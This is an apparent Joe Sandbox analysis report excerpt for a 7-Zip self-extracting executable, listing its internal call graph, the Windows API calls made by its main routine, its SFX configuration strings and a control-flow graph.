10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9987 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9987 10533->10531 10533->10532 10534->9987 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9977 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile

                                                                    Executed Functions

                                                                    Function 00405721 Relevance: 231.1, APIs: 93, Strings: 38, Instructions: 1811keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                      • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                      • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                      • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                      • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                      • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                      • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                      • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                    • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                    • _wtol.MSVCRT ref: 00405825
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                    • _wtol.MSVCRT ref: 00405A25
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                    • wsprintfW.USER32 ref: 00405D2A
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                      • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                    • _wtol.MSVCRT ref: 00405F6B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                    • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                    • _wtol.MSVCRT ref: 00406338
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                    • GetKeyState.USER32(00000010), ref: 004063BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                    • _wtol.MSVCRT ref: 0040686C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                      • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                      • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                      • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                      • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                    • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                    • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                    • API String ID: 1141480454-1804565692
                                                                    • Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                    • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                    • Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                    • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D
                                                                    Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 825 401815-401825 826 401831-40185c call 401132 call 41017a 825->826 827 401827-40182c 825->827 832 40185e 826->832 833 40186f-40187b call 401458 826->833 828 401b6f-401b72 827->828 835 401860-40186a call 40cb68 832->835 839 401b51-401b6c ??3@YAXPAX@Z call 40cb68 833->839 840 401881-401886 833->840 841 401b6e 835->841 839->841 840->839 842 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 840->842 841->828 852 401b37-401b3a 842->852 853 4018c8-4018e7 842->853 854 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 852->854 858 401902-401906 853->858 859 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 853->859 854->841 861 401908-40190b 858->861 862 40190d-401912 858->862 859->835 864 40193a-401951 861->864 865 401934-401937 862->865 866 401914 862->866 864->859 869 401953-401976 864->869 865->864 867 401916-40191c 866->867 871 40191e-40192f call 40cb68 ??3@YAXPAX@Z 867->871 874 401991-401997 869->874 875 401978-40198c call 40cb68 ??3@YAXPAX@Z 869->875 871->835 878 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 874->878 879 401999-40199c 874->879 875->835 883 4019cb-4019ce 878->883 881 4019a5-4019b1 879->881 882 40199e-4019a0 879->882 881->883 882->867 884 4019d0-4019da call 4036f1 883->884 885 4019e7-4019ee call 403387 883->885 884->871 892 4019e0-4019e2 884->892 888 4019f3-4019f8 885->888 890 401b23-401b32 GetLastError 888->890 891 4019fe-401a01 888->891 890->852 893 401a07-401a11 ??2@YAPAXI@Z 891->893 894 401b19-401b1c 891->894 892->867 895 401a22 893->895 896 401a13-401a20 893->896 894->890 898 401a24-401a48 call 40ef4a call 40ca5c 895->898 896->898 903 401afe-401b17 call 40f707 call 40cb68 898->903 904 401a4e-401a6c GetLastError call 40133e call 4030c7 898->904 903->854 913 401aa9-401abe call 4036f1 904->913 914 401a6e-401a75 904->914 920 401ac0-401ac8 913->920 921 401aca-401ae2 call 40ca5c 913->921 916 401a79-401a89 ??3@YAXPAX@Z 914->916 918 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 916->918 919 401a8b-401a8d 916->919 918->835 919->918 920->916 927 401ae4-401af3 GetLastError 921->927 928 401af5-401afd ??3@YAXPAX@Z 921->928 927->916 928->903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                    • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
